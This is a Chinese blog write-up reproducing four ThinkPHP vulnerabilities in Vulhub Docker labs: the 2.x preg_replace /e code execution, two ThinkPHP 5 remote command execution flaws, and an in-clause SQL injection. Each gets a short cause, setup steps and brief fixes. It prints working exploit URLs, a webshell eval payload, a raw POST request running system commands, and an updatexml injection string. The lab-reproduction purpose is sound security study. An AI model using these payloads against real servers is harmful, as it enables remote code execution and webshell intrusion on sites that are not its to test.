vulhub-thinkphp漏洞复现

最新推荐文章于 2024-02-02 11:31:49 发布
最新推荐文章于 2024-02-02 11:31:49 发布
阅读量2.3k 收藏 5
点赞数 2
分类专栏: 靶场通关 文章标签: 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51922767/article/details/126859373
版权

vulhub-thinkphp漏洞复现

https://silentx.gitee.io/2022/09/06/thinkphp/

一.ThinkPHP 2.x 任意代码执行漏洞

1.概述

漏洞成因:ThinkPHP 2.x版本中,使用preg_replace的 /e 模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

参考链接:https://www.freebuf.com/sectool/223149.html

2.环境搭建

2.1.使用vulhub的docker环境一键部署

systemctl start docker   //启动docker
git clone https://github.com/vulhub/vulhub.git  //拉取vulhub靶场代码
cd /vulhub/thinkphp/2-rce   //进入2-rce目录
docker-compose up -d   //启动docker环境
docker-compose ps  //查看服务端口

2.2.访问http://192.168.1.242:8080/

3.复现

3.1.执行phpinfo()

http://192.168.1.242:8080/index.php?s=/index/index/name/${@phpinfo()}

3.2.构造webshell

http://192.168.1.242:8080/index.php?s=/index/index/name/${@print(eval($_POST[123456]))}

4.防护

更新至较高版本

二.ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

1.概述

thinkphp5.0中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

参考链接:https://xz.aliyun.com/t/3570

2.环境搭建

2.1.使用vulhub的docker环境一键部署

systemctl start docker   //启动docker
git clone https://github.com/vulhub/vulhub.git  //拉取vulhub靶场代码
cd /vulhub/thinkphp/5-rce   //进入5-rce目录
docker-compose up -d   //启动docker环境
docker-compose ps  //查看服务端口

2.2.访问http://192.168.1.242:8080/

3.复现

执行命令whoami

http://192.168.1.242:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

使用工具

4.防护

升级,参考链接:https://blog.thinkphp.cn/869075

三.ThinkPHP5 5.0.23 远程代码执行漏洞

1.概述

thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

2.环境搭建

2.1.使用vulhub的docker环境一键部署

systemctl start docker   //启动docker
git clone https://github.com/vulhub/vulhub.git  //拉取vulhub靶场代码
cd /vulhub/thinkphp/5.0.23-rce   //进入5.0.23-rce目录
docker-compose up -d   //启动docker环境
docker-compose ps  //查看服务端口

2.2.访问http://192.168.1.242:8080/

3.复现

发包

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

同样可以使用工具利用漏洞

4.防护

升级

四.ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

1.概述

通过控制in语句的值位置,即可通过传入一个数组,从而造成了SQL注入漏洞

参考链接:https://xz.aliyun.com/t/125

2.环境搭建

2.1.使用vulhub的docker环境一键部署

systemctl start docker   //启动docker
git clone https://github.com/vulhub/vulhub.git  //拉取vulhub靶场代码
cd /vulhub/thinkphp/in-sqlinjection/  //进入in-sqlinjection目录
docker-compose up -d   //启动docker环境
docker-compose ps  //查看服务端口

2.2.访问http://192.168.1.242

3.复现

信息泄露

http://192.168.1.242/index.php?ids[]=1&ids[]=2

sql注入(不能进行子查询)

http://192.168.1.242/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

4.防护

对于这个$k 可以过滤掉所有的特殊字符,以防特殊字符的引入造成MYSQL的报错;当然最好的办法还是关闭掉debug模式。

0xActive
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ThinkPHP漏洞系列/2.x 任意代码执行漏洞
jammny
11-17 1358
漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 影响版本: Thinkphp2.x系列以及ThinkPHP 3.0版.
WebStackPage-ThinkPHP5:WebStackPage-ThinkPHP5由
03-13
是一个免费开源的导航项目初步WebStackPageDevelop最早基于ThinkPHP5Develop 用户可以在后台自定义添加分类菜单 用户可以在后台添加书签链接及图片 一键设置前端显示的站点信息/ Logo等 目前处于开发阶段,现有的...
DSCMS-Thinkphp内容管理系统 v1.0版
10-09
DScms是基于TP5.0框架开发,采用 PHP + Mysql 架构,是一款适合企业网站建设的 cms 建站系统,功能全面、 SEO 友好、双语言。现开发有五大功能模块:系统设置、用户管理、类容管理、运营
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
Thinkphp 使用Dompdf
06-08
Thinkphp 使用Dompdf
MAC可视化-shiro-struts2-weblogic-thinkphp-oa等一键利用漏洞-仅供测试使用,后果自行负责。
02-14
仅供测试使用,后果自行负责。
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
Vulhub复现--ThinkPHP框架系列(一)
tzyyyyyy的博客
04-27 622
Vulhub靶场关于ThinkPHP框架的漏洞复现
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 2383
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
vulhub漏洞复现Thinkphp 2.x 任意代码执行
RexHa的博客
02-28 2339
当preg_replace使用了/e模式,可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时,会将替换字符(第二个参数)当做代码来执行。在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由,导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
thinkphp系列漏洞复现(组合拳-vulhub里的)
m0_58596609的博客
01-07 1457
thinkphp系列漏洞复现(组合拳)
vulhubthinkphp复现
weixin_47346400的博客
05-07 713
1.搭建环境。 2.利用thinkphp检测工具扫描出对应的payload,直接上 3.针对rce-5.0的payload http://192.168.2.134:8080/index.php/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 在这里插入代码片?s=/index/\think\app/invokefu
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1514
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
thinkphp2.x任意代码执行漏洞学习笔记
Hezhoutheone的博客
09-23 1054
漏洞实验环境 靶机:Ubuntu虚拟机 攻击机:Windows10
tp中如何防止mysql注入_thinkphp如何防止sql注入xss攻击
weixin_42327688的博客
01-19 1588
SQL注入简介SQL 注入漏洞(SQL Injection)是 Web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。而造成 SQL 注入的原因是因为程序没有有效的转义过滤用户的输入,使攻击者成功的向服务器提交恶意的 SQL 查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一...
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
最新发布
鱼溯的博客
02-02 923
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现(详细图解)
thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1453
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 603
关于vulhubthinkPHP SQL注入的漏洞复现及其简单的原理介绍
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 483
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
Thinkphp5.1.4漏洞复现
05-11
ThinkPHP 5.1.4 存在的两个漏洞: - 20190307 ThinkPHP 5.1.4 远程代码执行漏洞 - 20190308 ThinkPHP 5.1.4 命令执行漏洞 这两个漏洞都是由于 ThinkPHP 5.1.4 中存在的一个路由注入漏洞导致的。 这里以远程代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值